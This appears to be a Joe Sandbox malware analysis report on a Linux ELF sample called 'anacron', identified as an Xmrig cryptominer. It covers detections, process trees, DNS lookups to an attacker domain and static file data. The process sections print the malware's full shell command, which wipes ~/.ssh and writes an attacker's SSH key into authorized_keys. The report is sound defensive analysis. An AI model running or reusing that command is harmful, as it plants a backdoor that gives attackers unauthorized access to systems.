ID: 202040 Sample Name: anacron Cookbook: defaultlinuxfilecookbook.jbs Time: 02:46:46 Date: 20/01/2020 Version: 28.0.0 Lapis Lazuli Table of Contents
Table of Contents 2 Analysis Report anacron 5 Overview 5 General Information 5 Detection 5 Classification 5 Mitre Att&ck Matrix 6 Signature Overview 7 AV Detection: 7 Bitcoin Miner: 7 Networking: 7 System Summary: 7 Persistence and Installation Behavior: 7 Malware Analysis System Evasion: 7 Malware Configuration 8 Runtime Messages 8 Behavior Graph 8 Yara Overview 8 Initial Sample 8 PCAP (Network Traffic) 9 Dropped Files 9 Sigma Overview 9 Joe Sandbox View / Context 9 IPs 9 Domains 9 ASN 9 JA3 Fingerprints 10 Dropped Files 10 Antivirus, Machine Learning and Genetic Malware Detection 10 Initial Sample 10 Dropped Files 10 Domains 10 URLs 10 Startup 10 Created / dropped Files 11 Domains and IPs 12 Contacted Domains 12 URLs from Memory and Binaries 12 Contacted IPs 12 Public 13 Static File Info 13 General 13 Static ELF Info 13 ELF header 13 Sections 14 Program Segments 14 Dynamic Tags 14 Symbols 15 Network Behavior 15 Network Port Distribution 15 TCP Packets 15 UDP Packets 15 DNS Queries 15 DNS Answers 15 System Behavior 16 Analysis Process: anacron PID: 20758 Parent PID: 20706 16 General 16 File Activities 16 File Read 16 Copyright Joe Security LLC 2020 Page 2 of 23 Directory Enumerated 16 Analysis Process: anacron PID: 20759 Parent PID: 20758 16 General 16 Analysis Process: sh PID: 20759 Parent PID: 20758 16 General 16 File Activities 17 File Read 17 File Written 17 Analysis Process: sh PID: 20761 Parent PID: 20759 17 General 17 Analysis Process: rm PID: 20761 Parent PID: 20759 17 General 17 File Activities 17 File Deleted 17 File Read 17 Analysis Process: sh PID: 20764 Parent PID: 20759 17 General 17 Analysis Process: mkdir PID: 20764 Parent PID: 20759 17 General 18 File Activities 18 File Read 18 Directory Created 18 Analysis Process: sh PID: 20771 Parent PID: 20759 18 General 18 Analysis Process: chmod PID: 20771 Parent PID: 20759 18 General 18 File Activities 18 File Read 18 Directory Enumerated 18 Permission Modified 18 Analysis Process: anacron PID: 20780 Parent PID: 20758 18 General 18 File Activities 18 File Read 19 File Written 19 Analysis Process: upstart PID: 20811 Parent PID: 20139 19 General 19 Analysis Process: sh PID: 20811 Parent PID: 20139 19 General 19 File Activities 19 File Read 19 Analysis Process: sh PID: 20812 Parent PID: 20811 19 General 19 Analysis Process: date PID: 20812 Parent PID: 20811 19 General 19 File Activities 19 File Read 20 Analysis Process: sh PID: 20813 Parent PID: 20811 20 General 20 Analysis Process: apport-checkreports PID: 20813 Parent PID: 20811 20 General 20 File Activities 20 File Read 20 File Written 20 Directory Enumerated 20 Analysis Process: upstart PID: 20838 Parent PID: 20139 20 General 20 Analysis Process: sh PID: 20838 Parent PID: 20139 20 General 20 File Activities 21 File Read 21 Analysis Process: sh PID: 20839 Parent PID: 20838 21 General 21 Analysis Process: date PID: 20839 Parent PID: 20838 21 General 21 File Activities 21 File Read 21 Analysis Process: sh PID: 20855 Parent PID: 20838 21 General 21 Analysis Process: apport-gtk PID: 20855 Parent PID: 20838 21 General 21 File Activities 21 File Read 22 File Written 22
Copyright Joe Security LLC 2020 Page 3 of 23 Directory Enumerated 22 Analysis Process: upstart PID: 20868 Parent PID: 20139 22 General 22 Analysis Process: sh PID: 20868 Parent PID: 20139 22 General 22 File Activities 22 File Read 22 Analysis Process: sh PID: 20869 Parent PID: 20868 22 General 22 Analysis Process: date PID: 20869 Parent PID: 20868 22 General 22 File Activities 23 File Read 23 Analysis Process: sh PID: 20870 Parent PID: 20868 23 General 23 Analysis Process: apport-gtk PID: 20870 Parent PID: 20868 23 General 23 File Activities 23 File Read 23 Directory Enumerated 23
Copyright Joe Security LLC 2020 Page 4 of 23 Analysis Report anacron
Overview
General Information
Joe Sandbox Version: 28.0.0 Lapis Lazuli Analysis ID: 202040 Start date: 20.01.2020 Start time: 02:46:46 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 3m 59s Hypervisor based Inspection enabled: false Report type: light Sample file name: anacron Cookbook file name: defaultlinuxfilecookbook.jbs Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171) Detection: MAL Classification: mal76.troj.mine.lin@0/4@4/0 Warnings: Show All
Detection
Strategy Score Range Reporting Whitelisted Threat Detection
Xmrig Threshold 76 0 - 100 false
Classification
Copyright Joe Security LLC 2020 Page 5 of 23 Ransomware
Miner Spreading
mmaallliiiccciiioouusss
malicious
Evader Phishing
sssuusssppiiiccciiioouusss
suspicious
cccllleeaann
clean
Exploiter Banker
Spyware Trojan / Bot
Adware
Mitre Att&ck Matrix
Remote Initial Privilege Defense Credential Lateral Command Network Service Access Execution Persistence Escalation Evasion Access Discovery Movement Collection Exfiltration and Control Effects Effects Valid Command-Line Hidden Files Port Hidden Files Credential Security Application Data from Data Standard Non- Eavesdrop on Remotely Accounts Interface 1 and Monitors and Dumping Software Deployment Local Compressed Application Insecure Track Device Directories 1 Directories 1 Discovery 1 Software System Layer Network Without Protocol 1 Communication Authorization Replication Scripting 1 Port Monitors Accessibility File and Network File and Remote Data from Exfiltration Standard Exploit SS7 to Remotely Through Features Directory Sniffing Directory Services Removable Over Other Application Redirect Phone Wipe Data Removable Permissions Discovery 1 Media Network Layer Calls/SMS Without Media Modification 1 Medium Protocol 1 Authorization External Windows Accessibility Path Scripting 1 Input System Windows Data from Automated Custom Exploit SS7 to Obtain Remote Management Features Interception Capture Information Remote Network Exfiltration Cryptographic Track Device Device Services Instrumentation Discovery 3 Management Shared Protocol Location Cloud Drive Backups Drive-by Scheduled System DLL Search File Credentials System Logon Input Data Multiband SIM Card Compromise Task Firmware Order Deletion 1 in Files Network Scripts Capture Encrypted Communication Swap Hijacking Configuration Discovery
Copyright Joe Security LLC 2020 Page 6 of 23 Signature Overview
• AV Detection • Bitcoin Miner • Networking • System Summary • Persistence and Installation Behavior • Malware Analysis System Evasion
Click to jump to signature section
AV Detection:
Antivirus detection for sample
Multi AV Scanner detection for submitted file
Bitcoin Miner:
Yara detected Xmrig cryptocurrency miner
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Networking:
Performs DNS lookups
Urls found in memory or binary data
System Summary:
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Classification label
Persistence and Installation Behavior:
Sample reads /proc/mounts (often used for finding a writable filesystem)
Counts the number of processes currently running
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Reads system information from the proc file system
Sample tries to set the executable flag
Malware Analysis System Evasion:
Reads CPU information from /proc indicative of miner or evasive malware Copyright Joe Security LLC 2020 Page 7 of 23 Reads CPU information from /sys indicative of miner or evasive malware
Uses the "uname" system call to query kernel version information (possible evasion)
Malware Configuration
No configs have been found
Runtime Messages
Command: /tmp/anacron Exit Code: 0 Exit Code Info: Killed: False Standard Output: [2020-01-20 03:47:29.290] unable to open '/tmp/config.json'. Standard Error:
Behavior Graph
Hide Legend Legend: Process Signature
Behavior Graph Created File ID: 202040 DNS/IP Info Sample: anacron Startdate: 20/01/2020 Architecture: LINUX Is Dropped Score: 76 Number of created Files
Is malicious 45.9.148.125, 45164, 80 unknown debian-package.center Internet Netherlands
started started started started
Antivirus detection Multi AV Scanner detection Yara detected Xmrig 2 other signatures for sample for submitted file cryptocurrency miner
upstart upstart upstart anacron sh sh sh
Sample reads /proc/mounts (often used for finding started started started started started started started started a writable filesystem)
anacron sh sh sh sh sh sh anacron sh date apport-checkreports date apport-gtk date apport-gtk
started started started
sh sh sh rm mkdir chmod
Yara Overview
Initial Sample
Source Rule Description Author Strings
Copyright Joe Security LLC 2020 Page 8 of 23 Source Rule Description Author Strings anacron JoeSecurity_Xmrig Yara detected Joe Security Xmrig cryptocurrency miner
PCAP (Network Traffic)
No yara matches
Dropped Files
No yara matches
Sigma Overview
No Sigma rule has matched
Joe Sandbox View / Context
IPs
Match Associated Sample Name / URL SHA 256 Detection Link Context 45.9.148.125 cron Get hash malicious Browse cQLmNrun Get hash malicious Browse
Domains
Match Associated Sample Name / URL SHA 256 Detection Link Context debian-package.center cron Get hash malicious Browse 45.9.148.129 cron Get hash malicious Browse 45.9.148.129
ASN
Match Associated Sample Name / URL SHA 256 Detection Link Context unknown testfile Get hash malicious Browse 91.189.92.20 Launcher.apk Get hash malicious Browse 216.58.201.99 5.45.79.15/input/?mark=20200116- Get hash malicious Browse 185.211.246.22 wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engke y=delonghi%20portafilter%20size 5.45.79.15/input/?mark=20200116- Get hash malicious Browse 185.211.246.22 wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engke y=delonghi portafilter size Project2.doc Get hash malicious Browse 51.15.6.128 https://top4top.io/downloadf-11687unj01-rar.html Get hash malicious Browse 54.38.152.27 www.ltyuye.com/wp-admin/rrktd1y-1v-75/ Get hash malicious Browse 23.235.217.105 txfc58.com/wordpress/m2utbn-3ft4c-07947/ Get hash malicious Browse 185.216.11 3.122 instructions 01 18 2020.doc Get hash malicious Browse 23.235.217.105 instructions 01 18 2020.doc Get hash malicious Browse 217.160.5.123 PO987889-JAN-20-20-Order_Quote,pdf.exe Get hash malicious Browse 172.217.23.193 koadic_test_online_9997_rundll.vbs Get hash malicious Browse 79.137.36.9 www.searchnewtabs.com/download Get hash malicious Browse 52.206.61.22 91.92.66.124/..j/ Get hash malicious Browse 91.92.66.124 https://gcc01.safelinks.protection.outlook.com/? Get hash malicious Browse 209.197.3.24 url=https%3A%2F%2Fsway.office.com%2FUN0jHy70XUb7BI Xa%3Fref%3DLink&data=02%7C01%7Cjh.jackson%40trade.g ov%7Cc3e4a0c456a7407e91f408d79a641704%7Ca1d183f26c 7b4d9ab9945f2f31b3f780%7C1%7C1%7C6371476269863866 89&sdata=AhWGM0VN8KygMfO7X6%2FHVaDVvk7tiKzPkuC oZ%2FooVfs%3D&reserved=0 Copyright Joe Security LLC 2020 Page 9 of 23 Match Associated Sample Name / URL SHA 256 Detection Link Context 95.179.163.186 Get hash malicious Browse 95.179.163.186 https://perfecttux.com Get hash malicious Browse 147.75.84.39 INVOICE FAF3766_778982019.doc Get hash malicious Browse 185.216.11 3.122 INVOICE FAF3766_778982019.doc Get hash malicious Browse 217.160.5.123 FileZilla_3.46.3_win64_sponsored-setup.exe Get hash malicious Browse 5.62.44.224
JA3 Fingerprints
No context
Dropped Files
No context
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Source Detection Scanner Label Link anacron 40% Virustotal Browse anacron 100% Avira LINUX/BitCoinMiner.hglyx
Dropped Files
No Antivirus matches
Domains
Source Detection Scanner Label Link debian-package.center 0% Virustotal Browse
URLs
Source Detection Scanner Label Link https://xmrig.com/docs/algorithms 0% Virustotal Browse https://xmrig.com/docs/algorithms 0% Avira URL Cloud safe
Startup
Copyright Joe Security LLC 2020 Page 10 of 23 system is lnxubuntu1 anacron (PID: 20758, Parent: 20706, MD5: 8d5d71c56b1f807edac5ac734feab41a) Arguments: /tmp/anacron anacron New Fork (PID: 20759, Parent: 20758) sh (PID: 20759, Parent: 20758, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9Eu WOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGP K5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~" sh New Fork (PID: 20761, Parent: 20759) rm (PID: 20761, Parent: 20759, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf .ssh sh New Fork (PID: 20764, Parent: 20759) mkdir (PID: 20764, Parent: 20759, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir .ssh sh New Fork (PID: 20771, Parent: 20759) chmod (PID: 20771, Parent: 20759, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod -R go= /home/user/.ssh anacron New Fork (PID: 20780, Parent: 20758) upstart New Fork (PID: 20811, Parent: 20139) sh (PID: 20811, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9 sh New Fork (PID: 20812, Parent: 20811) date (PID: 20812, Parent: 20811, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date sh New Fork (PID: 20813, Parent: 20811) apport-checkreports (PID: 20813, Parent: 20811, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system upstart New Fork (PID: 20838, Parent: 20139) sh (PID: 20838, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9 sh New Fork (PID: 20839, Parent: 20838) date (PID: 20839, Parent: 20838, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date sh New Fork (PID: 20855, Parent: 20838) apport-gtk (PID: 20855, Parent: 20838, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk upstart New Fork (PID: 20868, Parent: 20139) sh (PID: 20868, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9 sh New Fork (PID: 20869, Parent: 20868) date (PID: 20869, Parent: 20868, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date sh New Fork (PID: 20870, Parent: 20868) apport-gtk (PID: 20870, Parent: 20868, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk cleanup
Created / dropped Files
/home/user/.ssh/authorized_keys Process: /bin/sh File Type: OpenSSH RSA public key Size (bytes): 389 Entropy (8bit): 5.91239652812259 Encrypted: false MD5: A420F7A60A40F3FF3A806A01FEB1DFDA SHA1: 1AE65132B036DE51BCC62F66B51AE362E11182AF SHA-256: A8460F446BE540410004B1A8DB4083773FA46F7FE76FA84219C93DAA1669F8F2 SHA-512: 1BA854C321D89441291DA2638D65748FFA06923A63FD2BB9BE8A66440236503FB34E375726A8DA679B55CED51DDA82293FFCFB8BB76563E2DA0071222D3247BF Malicious: false Reputation: low Preview: ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1R V/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQH md1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySV KPRK+oRw== mdrfckr.
/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages Process: /tmp/anacron File Type: ASCII text, with no line terminators Size (bytes): 6 Entropy (8bit): 1.9182958340544893 Encrypted: false MD5: 1054DD099E3998ACB4C217F5AE41D8C8 SHA1: 9F649342B81C46321145FB8F13EDD0F61487F1B4 SHA-256: 498A8E5240652961A0C8BCE6BBAB33A705253FF3B4E81403E5CFE3B779263A5A SHA-512: 03070B43582647A6344B3FFB462DFB4F77814D6ABB77E162A42486B07A13CF0AEBAEB1F2E25003C104808AB9D7ECF6E70EC686C9078F7183BA3E2823216EF4B7 Malicious: false Reputation: low Preview: 128129
/var/crash/_usr_share_apport_apport-checkreports.1000.crash Process: /usr/share/apport/apport-checkreports File Type: ASCII text
Copyright Joe Security LLC 2020 Page 11 of 23 /var/crash/_usr_share_apport_apport-checkreports.1000.crash Size (bytes): 14923 Entropy (8bit): 4.684369237174026 Encrypted: false MD5: 62591DEB2982540970B8033F260B349B SHA1: 72631B02B97594A7D1B83641B26C85105E8B62B1 SHA-256: 931DAED4EDA2C49315FF866273E17758D9420E899244DB2A48043DCC5B12340C SHA-512: 6F9D6266231081B1FB32A845D22B0CC02F1C7E2EB4FA6CAAA7A8F309E44B44C181BE8CD17D0CC2568E3F69CA88D78ECE3E296A830A289058FA53F6DBC3F5CA 08 Malicious: false Reputation: low Preview: ProblemType: Crash.Date: Mon Jan 20 03:47:31 2020.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bi n/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=
/var/crash/_usr_share_apport_apport-gtk.1000.crash Process: /usr/share/apport/apport-gtk File Type: ASCII text Size (bytes): 47102 Entropy (8bit): 4.494867931830367 Encrypted: false MD5: 4949187FF25EB31488F0D5DB591FAD08 SHA1: 64D7171189CCE702169C62C441D063C953C86F6A SHA-256: 8B3DAFECEC14F6BDD7FE2AA80C019F0DB3590D487D8E0FAC63B89E4F09C96032 SHA-512: B29F2FB2E025C128A680A9A68F00D0CDDF3AAA971CD2928705BD876F8AD0194E40CE709B426874D8C4618430C90B46B0F4A1579BC3C090CB236EE272AB0B6794 Malicious: false Reputation: low Preview: ProblemType: Crash.Date: Mon Jan 20 03:47:31 2020.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3 .5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=< set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 01522000-01a45000 rw-p 00000000 00:00 0 [heap]. 7ff67717d000-7ff67727d000 rw-p 00000000 00:00 0 . 7ff67727d000- 7ff677294000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7ff677294000-7ff677493000 ---p 00017000 fc:00 2382
Domains and IPs
Contacted Domains
Name IP Active Malicious Antivirus Detection Reputation debian-package.center 45.9.148.117 true false 0%, Virustotal, Browse unknown
URLs from Memory and Binaries
Contacted IPs
Copyright Joe Security LLC 2020 Page 12 of 23 No. of IPs < 25% 25% < No. of IPs < 50%
50% < No. of IPs < 75% 75% < No. of IPs
Public
IP Country Flag ASN ASN Name Malicious 45.9.148.125 Netherlands 49447 unknown true
Static File Info
General File type: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped Entropy (8bit): 6.550050885060555 TrID: ELF Executable and Linkable format (generic) (4004/1) 100.00% File name: anacron File size: 2902776 MD5: 8d5d71c56b1f807edac5ac734feab41a SHA1: ca2064303d74f5fec98d717f35cd8ee20e81b722 SHA256: 49da718733de850ddd7e871fee1d2f041508d28b9cfc58a 822786151004a9c2c SHA512: 514337791f6c2b71e9303899a6206f92eb905c780729008 f3f754f256811332caa5d608662272a6eb3b1f3cf70d1ec5 28509bbe3f68c7960fc9df63c463fce3f SSDEEP: 49152:m7rTifP8qyUnJ1jIYuOwxC7mQ595+T91hGtZ1:Ir m38qyUnJ1jgx0B5evhG File Content Preview: .ELF...... 4...4....G,.....4. ...(...... pu..pu...... }.!.}.!...... ".. ".. "...... +...,...,. .T...... h<,.hL,.hL,...... +...,...,...... P.td0.#.0.#
Static ELF Info
ELF header Class: ELF32 Data: 2's complement, little endian Version: 1 (current) Machine: Intel 80386 Version Number: 0x1 Type: DYN (Shared object file)
Copyright Joe Security LLC 2020 Page 13 of 23 ELF header OS/ABI: UNIX - System V ABI Version: 0 Entry Point Address: 0xbf34 Flags: 0x0 ELF Header Size: 52 Program Header Offset: 52 Program Header Size: 32 Number of Program Headers: 9 Section Header Offset: 2901776 Section Header Size: 40 Number of Section Headers: 25 Header String Table Index: 24
Sections
Flags Name Type Address Offset Size EntSize Flags Description Link Info Align NULL 0x0 0x0 0x0 0x0 0x0 0 0 0 .gnu.hash GNU_HASH 0x154 0x154 0x18 0x4 0x2 A 2 0 4 .dynsym DYNSYM 0x16c 0x16c 0x10 0x10 0x2 A 3 1 4 .dynstr STRTAB 0x17c 0x17c 0x1 0x0 0x2 A 0 0 1 .rel.dyn REL 0x180 0x180 0x73f0 0x8 0x2 A 2 0 4 .init PROGBITS 0x8000 0x8000 0x11 0x0 0x6 AX 0 0 1 .plt PROGBITS 0x8020 0x8020 0x80 0x4 0x6 AX 0 0 16 .text PROGBITS 0x80a0 0x80a0 0x2194d1 0x0 0x6 AX 0 0 16 .fini PROGBITS 0x221571 0x221571 0xc 0x0 0x6 AX 0 0 1 .rodata PROGBITS 0x222000 0x222000 0x1c230 0x0 0x2 A 0 0 32 .eh_frame_hdr PROGBITS 0x23e230 0x23e230 0xbf7c 0x0 0x2 A 0 0 4 .eh_frame PROGBITS 0x24a1ac 0x24a1ac 0x6f068 0x0 0x2 A 0 0 4 .gcc_except_table PROGBITS 0x2b9214 0x2b9214 0x5ed1 0x0 0x2 A 0 0 4 .tbss NOBITS 0x2c020c 0x2bf20c 0x8 0x0 0x403 WAT 0 0 4 .init_array INIT_ARRAY 0x2c020c 0x2bf20c 0x78 0x4 0x3 WA 0 0 4 .fini_array FINI_ARRAY 0x2c0284 0x2bf284 0xc 0x4 0x3 WA 0 0 4 .ctors PROGBITS 0x2c0290 0x2bf290 0x8 0x0 0x3 WA 0 0 4 .dtors PROGBITS 0x2c0298 0x2bf298 0x8 0x0 0x3 WA 0 0 4 .data.rel.ro PROGBITS 0x2c02a0 0x2bf2a0 0x49c8 0x0 0x3 WA 0 0 32 .dynamic DYNAMIC 0x2c4c68 0x2c3c68 0xc8 0x8 0x3 WA 3 0 4 .got PROGBITS 0x2c4d30 0x2c3d30 0x2c4 0x4 0x3 WA 0 0 4 .data PROGBITS 0x2c5000 0x2c4000 0x624 0x0 0x3 WA 0 0 32 .bss NOBITS 0x2c5640 0x2c4624 0x9490 0x0 0x3 WA 0 0 64 .comment PROGBITS 0x0 0x2c4624 0x1a 0x1 0x30 MS 0 0 1 .shstrtab STRTAB 0x0 0x2c463e 0xd2 0x0 0x0 0 0 1
Program Segments
Physical Flags Type Offset Virtual Address Address File Size Memory Size Flags Description Align Prog Interpreter Section Mappings LOAD 0x0 0x0 0x0 0x7570 0x7570 0x4 R 0x1000 .gnu.hash .dynsym .dynstr .rel.dyn LOAD 0x8000 0x8000 0x8000 0x21957d 0x21957d 0x5 R E 0x1000 .init .plt .text .fini LOAD 0x222000 0x222000 0x222000 0x9d0e5 0x9d0e5 0x4 R 0x1000 .rodata .eh_frame_hdr .eh_frame .gcc_except_table LOAD 0x2bf20c 0x2c020c 0x2c020c 0x5418 0xe8c4 0x6 RW 0x1000 .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got .data .bss DYNAMIC 0x2c3c68 0x2c4c68 0x2c4c68 0xc8 0xc8 0x6 RW 0x4 .dynamic TLS 0x2bf20c 0x2c020c 0x2c020c 0x0 0x8 0x4 R 0x4 GNU_EH_FRAME 0x23e230 0x23e230 0x23e230 0xbf7c 0xbf7c 0x4 R 0x4 .eh_frame_hdr GNU_STACK 0x0 0x0 0x0 0x0 0x0 0x6 RW 0x10 GNU_RELRO 0x2bf20c 0x2c020c 0x2c020c 0x4df4 0x4df4 0x4 R 0x1 .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got
Dynamic Tags
Type Meta Value Tag DT_SYMBOLIC value 0x0 0x10 DT_INIT value 0x8000 0xc DT_FINI value 0x221571 0xd DT_INIT_ARRAY value 0x2c020c 0x19 Copyright Joe Security LLC 2020 Page 14 of 23 Type Meta Value Tag DT_INIT_ARRAYSZ bytes 120 0x1b DT_FINI_ARRAY value 0x2c0284 0x1a DT_FINI_ARRAYSZ bytes 12 0x1c DT_GNU_HASH value 0x154 0x6ffffef5 DT_STRTAB value 0x17c 0x5 DT_SYMTAB value 0x16c 0x6 DT_STRSZ bytes 1 0xa DT_SYMENT bytes 16 0xb DT_DEBUG value 0x0 0x15 DT_PLTGOT value 0x2c4d30 0x3 DT_REL value 0x180 0x11 DT_RELSZ bytes 29680 0x12 DT_RELENT bytes 8 0x13 DT_BIND_NOW value 0x0 0x18 DT_FLAGS_1 value 0x8000001 0x6ffffffb DT_RELCOUNT value 3710 0x6ffffffa DT_NULL value 0x0 0x0
Symbols
Version Info Version Info File Symbol Name Name Name Section Name Value Size Symbol Type Symbol Bind Visibility Ndx .dynsym 0x0 0 NOTYPE
Network Behavior
Network Port Distribution
Total Packets: 12 • 53 (DNS) • 80 (HTTP)
TCP Packets
UDP Packets
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jan 20, 2020 02:47:30.142142057 CET 192.168.2.20 8.8.8.8 0xc389 Standard query debian-pac A (IP address) IN (0x0001) (0) kage.center Jan 20, 2020 02:47:30.142239094 CET 192.168.2.20 8.8.4.4 0xc389 Standard query debian-pac A (IP address) IN (0x0001) (0) kage.center Jan 20, 2020 02:47:30.142302990 CET 192.168.2.20 8.8.8.8 0xd8bc Standard query debian-pac 28 IN (0x0001) (0) kage.center Jan 20, 2020 02:47:30.142364979 CET 192.168.2.20 8.8.4.4 0xd8bc Standard query debian-pac 28 IN (0x0001) (0) kage.center
DNS Answers
Copyright Joe Security LLC 2020 Page 15 of 23 Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class Jan 20, 2020 8.8.8.8 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.117 A (IP address) IN (0x0001) 02:47:30.167655945 kage.center CET Jan 20, 2020 8.8.8.8 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.129 A (IP address) IN (0x0001) 02:47:30.167655945 kage.center CET Jan 20, 2020 8.8.8.8 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.125 A (IP address) IN (0x0001) 02:47:30.167655945 kage.center CET Jan 20, 2020 8.8.4.4 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.125 A (IP address) IN (0x0001) 02:47:30.167726040 kage.center CET Jan 20, 2020 8.8.4.4 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.117 A (IP address) IN (0x0001) 02:47:30.167726040 kage.center CET Jan 20, 2020 8.8.4.4 192.168.2.20 0xc389 No error (0) debian-pac 45.9.148.129 A (IP address) IN (0x0001) 02:47:30.167726040 kage.center CET
System Behavior
Analysis Process: anacron PID: 20758 Parent PID: 20706
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: /tmp/anacron File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a
File Activities
File Read
Directory Enumerated
Analysis Process: anacron PID: 20759 Parent PID: 20758
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: n/a File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a
Analysis Process: sh PID: 20759 Parent PID: 20758
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh
Copyright Joe Security LLC 2020 Page 16 of 23 Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9 p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1 kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGm d4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~" File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
File Activities
File Read
File Written
Analysis Process: sh PID: 20761 Parent PID: 20759
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: rm PID: 20761 Parent PID: 20759
General
